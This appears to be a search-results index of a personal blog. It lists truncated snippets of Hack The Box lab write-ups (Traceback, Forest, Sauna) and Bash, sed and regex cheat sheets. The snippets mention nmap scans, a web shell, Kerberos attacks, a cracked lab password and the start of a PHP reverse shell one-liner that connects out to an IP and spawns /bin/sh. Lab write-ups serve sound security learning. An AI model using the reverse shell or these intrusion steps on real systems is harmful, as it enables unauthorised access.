77 total results found
Hack The Box
Active && Retired Writeups
Exploring the System as User
To get root, we will need a proper user shell. Taking the lua exploit we used to print the user f...
Methods for privilege escalation to root
Enumeration methods for obtaining root access.
Steps to getting Django project prepared for production environment. Using `nginx` as webserve...
Starting off with a typical htb nmap scan: nmap -AT4 -Pn -p- -v -oN Traceback 10.10.10.181 We...
Web Shell Exploitation
Heading over to 10.10.10.181/smevk.php we can see its prompting us for login. Checking the smevk....
Starting off with a typical super intrusive nmap scan,nmap -T5 -APn -o Forest -p- 10.10.10.161 W...
What is Enum4Linux? A Linux alternative to enum.exe for enumerating data from Windows and Samba ...
Impacket - Get Users from Active Directory
So far we have received enough information to start forming an attack.We will try to perform kerb...
Cracking password and owning user
With success, we get a password s3rvice for user svc-alfresco Since we also saw earlier, ...
Exploiting Poor Configuration
Exploiting this will be pretty straight forward. Knowing we have a short window (30 seconds) to ...
Handling Signals Signaling the bash shell
John the Ripper
File Comparisons -d Checks if file exists and is a directory if [ -d $file ]thendo_somethi...
String Comparisons str1 = str2 Checks if str1 is the same as str2 if [ $str1 = $str2 ]the...
Numeric Comparisons The most common test evaluation methods perform a comparison of two numerica...
Double Parentheses The double parentheses command allows you to incorporate advanced mathematica...
Double Brackets [[
Pattern Matching The double bracket command provides advanced features for string comparisons, p...
PHP Reverse Shell php -r '$sock=fsockopen("192.168.1.7",80);exec("/bin/sh -i <&3 >...
Linux Signals Cheat Sheet Most Used Linux Signals Signal Value Description 1 SIGHUP Ha...
SED Quick Reference Guide
Introduction Format sed options script file The options parameters allow you have more co...
Special Character Classes Class Description [[:alpha:]] Matching any alphabetical charact...
The methods of getting to user
Numerical, String, and File Comparisons reference page.
Creators: xh4h OS : Linux Difficulty: Easy Points: 20 Release: 14 Mar 2020 IP: 10.10.10.181
Creators: egre55 & mrb3n OS: Windows Difficulty: Easy Points: 20 Release: 12 Oct 2019 IP: ...
RETIRED A Windows server that was heavily focused on website & Active Directory enumeration. Hac...
Resources for all things BaSH related ^_^ * Cheat Sheets * References * Docs
All the common reverse shells you could possibly think of
StreamlineEDitor quick reference guide :)
An overview and quick reference guide to regular expressions with POSIX
Creators: sulcud OS : Linux Difficulty: Medium Points: 30 Release: 11 Jul 2020 IP: 10.10.10.197
The company that has an active fortress. 11 flags The Environment Our infrastructure is ...
This company has an active fortress. 11 flags. The Environment Our infrastructure is larg...
how to get user flag
Escalation to Root
Starting off with a typical htb nmap scan: nmap -AT4 -Pn -p- -v -oN Sauna 10.10.10.175 We can...